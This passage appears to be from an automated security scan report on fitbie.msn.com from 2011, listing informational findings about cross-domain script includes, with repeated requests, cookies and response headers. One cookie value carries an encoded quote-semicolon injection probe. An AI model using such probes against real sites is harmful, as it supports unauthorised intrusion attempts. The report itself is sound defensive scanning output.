Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607150-1"
Last-Modified: Sun, 13 Feb 2011 14:25:50 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42728
Expires: Mon, 14 Feb 2011 02:26:45 GMT
Date: Sun, 13 Feb 2011 14:34:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.30. http://fitbie.msn.com/slideshow/8-ridiculously-cheap-healthy-foods previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/8-ridiculously-cheap-healthy-foods

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/8-ridiculously-cheap-healthy-foods HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297600929-1"
Last-Modified: Sun, 13 Feb 2011 12:42:09 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=36701
Expires: Mon, 14 Feb 2011 00:46:52 GMT
Date: Sun, 13 Feb 2011 14:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.31. http://fitbie.msn.com/slideshow/9-cutting-edge-abs-exercises previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/9-cutting-edge-abs-exercises

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/9-cutting-edge-abs-exercises HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607204-1"
Last-Modified: Sun, 13 Feb 2011 14:26:44 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42724
Expires: Mon, 14 Feb 2011 02:26:50 GMT
Date: Sun, 13 Feb 2011 14:34:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.32. http://fitbie.msn.com/slideshow/amazing-weight-loss-success previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/amazing-weight-loss-success

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/amazing-weight-loss-success HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.33. http://fitbie.msn.com/slideshow/build-perfect-home-gym previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/build-perfect-home-gym

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/build-perfect-home-gym HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.34. http://fitbie.msn.com/slideshow/food-face previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/food-face

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/food-face HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607181-1"
Last-Modified: Sun, 13 Feb 2011 14:26:21 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42861
Expires: Mon, 14 Feb 2011 02:26:00 GMT
Date: Sun, 13 Feb 2011 14:31:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.35. http://fitbie.msn.com/slideshow/secrets-slim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/secrets-slim

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/secrets-slim HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.36. http://fitbie.msn.com/slideshow/they-lost-weight-together previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/they-lost-weight-together

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /slideshow/they-lost-weight-together HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.37. http://fitbie.msn.com/slideshow/why-being-single-better-your-body previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/why-being-single-better-your-body

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

Response

5.38. http://fitbie.msn.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/videos

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /videos HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.39. http://fitbie.msn.com/videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/videos/

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /videos/ HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

5.40. http://fitbie.msn.com/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /weight-loss-basics/tips/6-happiest-ways-beat-belly-fat HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; 